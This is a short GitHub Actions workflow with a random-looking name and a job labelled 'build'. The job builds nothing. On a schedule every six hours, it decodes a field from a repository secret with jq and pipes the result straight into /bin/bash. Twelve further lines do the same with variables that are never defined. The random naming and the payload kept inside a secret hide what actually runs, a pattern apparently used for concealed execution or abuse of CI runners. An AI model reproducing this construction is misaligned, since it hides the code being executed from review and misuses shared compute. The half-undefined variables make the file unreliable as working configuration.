name: durufei6718

on:
  workflow_dispatch:
  schedule:
    - cron: '48 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: durufei6718
        env:
          c18204: ${{ secrets.c18204 }}
        run: |
          echo $c18204 | jq -r .mjkxp89 | /bin/bash
          echo $zm193 | jq -r .pwvy72489 | /bin/bash
          echo $szc8 | jq -r .ohjp42428 | /bin/bash
          echo $yimik339 | jq -r .jnkl8 | /bin/bash
          echo $pihb84636 | jq -r .o9 | /bin/bash
          echo $ez847 | jq -r .rvcpc92895 | /bin/bash
          echo $ujko33 | jq -r .yqkdu55229 | /bin/bash
          echo $fdhsx72352 | jq -r .rg2094 | /bin/bash
          echo $ha748 | jq -r .skfst3 | /bin/bash
          echo $oab2413 | jq -r .rjfin6 | /bin/bash
          echo $puo18615 | jq -r .qdyv3653 | /bin/bash
          echo $rw93 | jq -r .wd5215 | /bin/bash
          echo $px26 | jq -r .z920 | /bin/bash

